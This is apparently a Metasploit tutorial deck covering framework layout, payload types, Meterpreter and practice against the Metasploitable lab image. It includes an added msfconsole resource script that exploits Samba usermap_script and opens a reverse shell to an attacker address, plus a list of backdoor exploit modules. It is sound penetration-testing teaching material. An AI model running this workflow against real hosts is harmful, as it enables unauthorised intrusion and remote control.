METASPLOIT
THE METASPLOIT FRAMEWORK IS AN OPEN SOURCE PENETRATION TESTING TOOL USED FOR
DEVELOPING AND EXECUTING EXPLOIT CODE AGAINST A REMOTE TARGET MACHINE. THE
FRAMEWORK SHIPS WITH ONE OF THE LARGEST DATABASES OF PUBLIC, TESTED EXPLOIT
MODULES.
METASPLOIT STRUCTURE
METASPLOIT ARCHITECTURE
- FILESYSTEM AND LIBRARIES
Metasploit Filesystem
The MSF filesystem is laid out in an intuitive manner and is organized by directory.
• data: editable files used by Metasploit
• documentation: provides documentation for the framework
• external: source code and third-party libraries
• lib: the ‘meat’ of the framework code base
• modules: the actual MSF modules
• plugins: plugins that can be loaded at run-time
• scripts: Meterpreter and other scripts
• tools: various useful command-line utilities
Metasploit Libraries
The MSF libraries help us to run our exploits without having to write additional code for
rudimentary tasks, such as HTTP requests or encoding of payloads.
METASPLOIT ARCHITECTURE
- MODULES AND LOCATIONS
Exploits
•Defined as modules that use payloads
•An exploit without a payload is an Auxiliary module (scanners, fuzzers, sniffers and the like)
Payloads, Encoders, Nops
•Payloads consist of the code that runs remotely on the target once the exploit succeeds
•Encoders transform the payload bytes so they survive the trip to the target, for example by avoiding null bytes or other characters the vulnerable input rejects; they are not a reliable antivirus-evasion tool
•Nops generate NOP sleds and padding so payloads keep a consistent size
Primary Module Tree
•Located under /usr/share/metasploit-framework/modules/ on Kali and similar packaged installs (the path depends on how Metasploit was installed)
User-Specified Module Tree
•Located under ~/.msf4/modules/ and loaded automatically at startup
•This location is ideal for private module sets; it must mirror the primary tree's layout (auxiliary/, exploits/, payloads/, ... then subdirectories)
Loading Additional Module Trees
Metasploit lets you load extra module trees either when msfconsole starts or after it is already
running. Pass the -m option, followed by the directory path, when launching msfconsole to load a tree at startup.
If you need to load additional modules after the console is already running, use the loadpath
command from within msfconsole, giving it the same kind of directory path.
Metasploit Object Model
In the Metasploit Framework, all modules are Ruby classes.
Modules inherit from the type-specific class
The type-specific class inherits from the Msf::Module class
There is a shared common API between modules
Payloads are slightly different: they are created at runtime from various components,
gluing a stager together with a stage (single payloads are the exception and stand alone).
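The following is an added example, written for this page rather than taken from the slides or from the Metasploit project. It ties the two preceding slides together: it builds a private module tree under the user tree, drops in a hypothetical minimal scanner module (so the class layout of the object model is visible in a real file), and then shows both ways of loading the tree, `msfconsole -m` at launch and `loadpath` from a running console. The module root, the module name `banner_peek`, and the target address 192.0.2.10 are assumptions chosen for the example.

```shell
#!/bin/sh
# Added example (not from the slides or Metasploit itself): a private module
# tree, loaded at launch with `msfconsole -m` or from the console with `loadpath`.

# Root of the private tree. Both -m and loadpath expect the same layout as the
# primary tree: <root>/<type>/<subdirs>/<module>.rb, type being auxiliary,
# exploits, payloads, encoders, nops or post. Default is Metasploit's own user tree.
MODULE_ROOT="${MODULE_ROOT:-$HOME/.msf4/modules}"

# Write a hypothetical minimal auxiliary scanner into the private tree.
# It shows the object model: a module is a Ruby class, inheriting from the
# type-specific class (Msf::Auxiliary), which inherits from Msf::Module.
write_private_module() {
  dir="$MODULE_ROOT/auxiliary/scanner/private"
  mkdir -p "$dir"
  cat > "$dir/banner_peek.rb" <<'EOF'
##
# Hypothetical module written for this example; not part of Metasploit.
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp   # connect/disconnect/sock/rport
  include Msf::Auxiliary::Scanner     # RHOSTS/THREADS and run_host per target

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Private banner peek',
      'Description' => 'Reads the first bytes a TCP service sends on connect',
      'Author'      => ['editor'],
      'License'     => MSF_LICENSE))
    register_options([Opt::RPORT(21)])
  end

  # Called once per host in RHOSTS by the Scanner mixin.
  def run_host(ip)
    connect
    banner = sock.get_once(-1, 5)
    print_good("#{ip}:#{rport} #{banner.strip}") if banner
  rescue ::Rex::ConnectionError => e
    vprint_error("#{ip}:#{rport} #{e.message}")
  ensure
    disconnect
  end
end
EOF
  printf '%s\n' "$dir/banner_peek.rb"
}

# Resource script: loads the tree from inside a running console and runs the
# module. Each line is what you would type at the msf > prompt.
write_resource_script() {
  rc="${1:-/tmp/private_tree.rc}"
  cat > "$rc" <<EOF
loadpath $MODULE_ROOT
use auxiliary/scanner/private/banner_peek
set RHOSTS 192.0.2.10
set RPORT 21
run
exit
EOF
  printf '%s\n' "$rc"
}

# Launch variant: -m adds the tree before the console starts, so the loadpath
# line in the rc file is then redundant. -q suppresses the banner, -r replays the rc.
launch() {
  rc=$(write_resource_script)
  msfconsole -q -m "$MODULE_ROOT" -r "$rc"
}
```

Run `write_private_module` once, then either `launch` or start msfconsole by hand and type the rc lines. The private tree is also picked up automatically at startup when it lives under ~/.msf4/modules, so `-m` and `loadpath` matter mainly for trees kept elsewhere (a shared repository, a per-engagement directory).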
METASPLOIT FUNDAMENTALS
Msfconsole interface
The msfconsole is probably the most popular interface to the Metasploit Framework (MSF). It provides an “all-
in-one” centralized console and allows you efficient access to virtually all of the options available in the MSF.
Msfconsole may seem intimidating at first, but once you learn the syntax of the commands you will learn to
appreciate the power of utilizing this interface.
Launching msfconsole
The -q option removes the launch banner by starting
msfconsole in quiet mode.
Active Exploits
Active exploits attack a specific host, run until
completion, and then exit.
Brute-force modules exit as soon as a shell opens from
the victim.
Module execution stops if an error is encountered.
You can force an active module into the background by
passing '-j' to the exploit command; it then runs as a job and
any session it opens is announced asynchronously.
Passive Exploits
Passive exploits wait for incoming hosts and exploit them
as they connect.
Passive exploits almost always target clients such as
web browsers, FTP clients, etc.
They can also be used in conjunction with email-borne lures,
waiting for the victim to connect.
Passive exploits report shells as they happen; the open
sessions can be enumerated by passing '-l' to the sessions command.
Passing '-i <id>' interacts with the chosen session.
IN SHORT
Vulnerability - A weakness which allows an attacker to break into or compromise a system's security.
Like the main gate of a house with a weak lock (easily opened) or a glass window (easily broken), vulnerabilities
in a system make it easy for an attacker to break in.
Exploit - Code which allows an attacker to take advantage of a vulnerability in a system.
The set of keys the attacker can try one by one to open the lock, or the hammer used to break the glass
window, are the exploits.
Payload - The actual code which runs on the system after exploitation.
Once the vulnerability has been exploited and the attacker is inside, there are different things to
do: steal money, destroy things, or just look around and leave. Deciding this
is what we mean by setting the payload.
What Does Payload Mean?
A payload in Metasploit is the code that runs on the target once an exploit has succeeded. Payloads are their own
module type, chosen separately from the exploit (after selecting an exploit, show payloads lists the compatible ones).
There are three different types of payload modules in the Metasploit Framework: Singles, Stagers, and Stages.
Whether or not a payload is staged is visible in its name: in a single the function and the transport are joined
with '_', in a staged payload the stage and the stager are separated by '/'. For example,
"windows/shell_bind_tcp" is a single payload with no stage, whereas "windows/shell/bind_tcp" consists of a stager
(bind_tcp) and a stage (shell).
Singles
Singles are payloads that are self-contained and completely standalone. A single payload can be
something as simple as adding a user to the target system or running calc.exe.
Stagers
Stagers set up a network connection between the attacker and victim and are designed to be small and reliable.
It is difficult to always do both of these well, so the result is multiple similar stagers. Metasploit will use the best
one when it can and fall back to a less-preferred one when necessary.
Stages
Stages are payload components that are downloaded by stager modules. The various payload stages provide
advanced features with no size limits, such as Meterpreter, VNC Injection, and the iPhone 'ipwn' shell.
What is Meterpreter?
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and
is extended over the network at runtime. It communicates over the stager socket and provides a
comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Meterpreter was originally written by skape for Metasploit 2.x; common extensions were merged for 3.x and
it was overhauled again for Metasploit 3.3. The server portion is implemented in plain C and is
compiled with MSVC, making it somewhat portable. The client can be written in any language, but Metasploit
ships a full-featured Ruby client API.
AFTER GATHERING INFORMATION ABOUT THE
TARGET SYSTEM
1. SELECT THE RIGHT EXPLOIT AND THEN SET THE TARGET.
2. VERIFY THE EXPLOIT OPTIONS (SHOW OPTIONS) TO DETERMINE WHETHER THE TARGET SYSTEM IS VULNERABLE TO THE EXPLOIT; WHERE THE MODULE SUPPORTS IT, THE CHECK COMMAND TESTS THIS WITHOUT EXPLOITING.
3. SELECT A PAYLOAD.
4. EXECUTE THE EXPLOIT.
Exploiting linux
Metasploitable
METASPLOITABLE IS A PURPOSELY VULNERABLE UBUNTU 8.04 IMAGE THAT RUNS SEVERAL
UNPATCHED SERVICES. IT IS A GREAT PLATFORM ON WHICH TO PRACTICE AND DEVELOP YOUR
PENETRATION TESTING SKILLS ON LINUX. RUN IT ONLY ON AN ISOLATED, HOST-ONLY NETWORK.
Exploiting the Samba service
Finding the version of Samba on the Linux machine using the auxiliary/scanner/smb/smb_version module.
Reverse connection established: a session is created.
Other exploits you can use:-
• USE EXPLOIT/UNIX/IRC/UNREAL_IRCD_3281_BACKDOOR
• USE EXPLOIT/UNIX/FTP/VSFTPD_234_BACKDOOR
• USE EXPLOIT/MULTI/SAMBA/USERMAP_SCRIPT
• USE EXPLOIT/MULTI/HTTP/PHP_CGI_ARG_INJECTION
• USE EXPLOIT/LINUX/MISC/DRB_REMOTE_CODEEXEC
Exploits information
• USE EXPLOIT/UNIX/IRC/UNREAL_IRCD_3281_BACKDOOR :- THIS MODULE TRIGGERS A MALICIOUS BACKDOOR THAT WAS
PLANTED IN THE UNREALIRCD 3.2.8.1 DOWNLOAD ARCHIVE; IT WAS PRESENT FROM LATE 2009 UNTIL IT WAS DISCOVERED
AND REMOVED IN 2010.
• USE EXPLOIT/UNIX/FTP/VSFTPD_234_BACKDOOR :- LIKEWISE A BACKDOOR PLANTED IN THE VSFTPD 2.3.4 SOURCE ARCHIVE,
NOT A BUG IN VSFTPD ITSELF.
• USE EXPLOIT/MULTI/SAMBA/USERMAP_SCRIPT :- COMMAND INJECTION (CVE-2007-2447) IN SAMBA 3.0.20 THROUGH
3.0.25RC3 WHEN THE NON-DEFAULT "USERNAME MAP SCRIPT" OPTION IS CONFIGURED, AS IT IS ON METASPLOITABLE.
FOR EXPLOITING SAMBA (IN LINUX) USING METASPLOIT :-
1) USE AUXILIARY/SCANNER/SMB/SMB_VERSION -- FOR FINDING THE VERSION OF SAMBA (SET RHOSTS, THEN RUN)
2) USE AUXILIARY/SCANNER/SMB/SMB_ENUMSHARES -- LISTS THE SHARES THE SERVER EXPOSES
3) USE EXPLOIT/MULTI/SAMBA/USERMAP_SCRIPT -- SET RHOST (RHOSTS ON CURRENT VERSIONS), RPORT (139) AND LHOST
FOR THE REVERSE PAYLOAD, THEN RUN THE EXPLOIT COMMAND.
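As an added example, not part of the slides, here is the four-step workflow (select exploit, verify options, select payload, execute) applied to the Samba steps just listed, written as a msfconsole resource script so it replays identically on every run. It also shows the `exploit -j` and `sessions -l` usage from the active/passive exploits slide. The target address 192.0.2.10, the attacker address 192.0.2.1, and the script path are assumptions for the example; the module and option names are Metasploit's own.

```shell
#!/bin/sh
# Added example (not from the slides): the Samba usermap_script workflow as a
# msfconsole resource script. Addresses are placeholders from the RFC 5737 range.

TARGET="${TARGET:-192.0.2.10}"     # assumed Metasploitable address
LHOST="${LHOST:-192.0.2.1}"        # attacker address the reverse shell calls back to
RC="${RC:-/tmp/samba_usermap.rc}"  # where the resource script is written

# Build the resource script. Each line is what you would type at the msf > prompt;
# lines starting with '#' are ignored by msfconsole.
write_rc() {
  cat > "$RC" <<EOF
# 1. fingerprint: which Samba version is listening?
use auxiliary/scanner/smb/smb_version
set RHOSTS $TARGET
run

# 2. enumerate shares (also confirms SMB is reachable)
use auxiliary/scanner/smb/smb_enumshares
set RHOSTS $TARGET
run

# 3. exploit: Samba 3.0.20-3.0.25rc3 with 'username map script' configured.
#    Older consoles spell the target option RHOST; current ones accept RHOSTS.
use exploit/multi/samba/usermap_script
set RHOSTS $TARGET
set RPORT 139
set PAYLOAD cmd/unix/reverse
set LHOST $LHOST
show options
# -j backgrounds the exploit as a job; the session is announced when it lands
exploit -j
sleep 10
# 4. list sessions; interact with 'sessions -i <id>' when working by hand
sessions -l
EOF
  printf '%s\n' "$RC"
}

# -q suppresses the banner, -r replays the resource script; the console stays
# open afterwards so you can run 'sessions -i 1' on the shell that came back.
launch() {
  write_rc >/dev/null
  msfconsole -q -r "$RC"
}
```

The `sleep` between `exploit -j` and `sessions -l` is msfconsole's own sleep command, giving the reverse shell time to connect back before the session list is printed; when driving the console interactively you simply wait for the "Command shell session 1 opened" line instead.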
Thank you
